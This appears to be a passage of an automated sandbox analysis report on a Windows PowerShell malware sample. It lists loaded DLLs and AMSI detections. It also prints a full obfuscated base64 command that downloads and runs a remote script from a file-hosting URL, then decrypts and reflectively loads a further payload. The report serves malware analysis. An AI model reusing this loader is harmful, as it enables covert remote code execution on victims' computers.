              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              barindex
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk